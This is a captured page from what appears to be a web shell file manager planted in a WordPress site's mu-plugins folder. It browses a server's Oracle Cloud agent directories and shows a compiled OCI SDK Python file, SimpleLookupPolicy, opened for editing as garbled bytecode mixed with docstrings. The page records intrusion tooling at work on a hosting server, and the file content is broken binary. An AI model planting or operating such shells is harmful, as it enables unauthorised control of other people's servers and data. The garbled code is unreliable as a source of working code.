📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
apigateway
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/apigateway/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: simple_lookup_policy.pyc
a N��f� � @ sD d dl mZ ddlmZmZmZ ddlmZ eG dd� de��ZdS )� )�ResponseCacheLookupPolicy� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ sJ e Zd ZdZdd� Zedd� �Zejdd� �Zdd� Zd d � Z dd� Z d S )�SimpleLookupPolicyzK Provides ability to vary the cache key using context expressions. c K sB ddddd�| _ ddddd�| _d | _d | _d | _d | _d | _d S )aI Initializes a new SimpleLookupPolicy object with values from keyword arguments. The default value of the :py:attr:`~oci.apigateway.models.SimpleLookupPolicy.type` attribute of this class is ``SIMPLE_LOOKUP_POLICY`` and it should not be changed. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param type: The value to assign to the type property of this SimpleLookupPolicy. Allowed values for this property are: "SIMPLE_LOOKUP_POLICY" :type type: str :param is_enabled: The value to assign to the is_enabled property of this SimpleLookupPolicy. :type is_enabled: bool :param is_private_caching_enabled: The value to assign to the is_private_caching_enabled property of this SimpleLookupPolicy. :type is_private_caching_enabled: bool :param cache_key_additions: The value to assign to the cache_key_additions property of this SimpleLookupPolicy. :type cache_key_additions: list[str] �str�boolz list[str])�type� is_enabled�is_private_caching_enabled�cache_key_additionsr � isEnabled�isPrivateCachingEnabled�cacheKeyAdditionsN�SIMPLE_LOOKUP_POLICY)� swagger_types� attribute_map�_type�_is_enabled�_is_private_caching_enabled�_cache_key_additions)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/apigateway/models/simple_lookup_policy.py�__init__ s ��zSimpleLookupPolicy.__init__c C s | j S )av Gets the cache_key_additions of this SimpleLookupPolicy. A list of context expressions whose values will be added to the base cache key. Values should contain an expression enclosed within ${} delimiters. Only the request context is available. :return: The cache_key_additions of this SimpleLookupPolicy. :rtype: list[str] �r �r r r r r <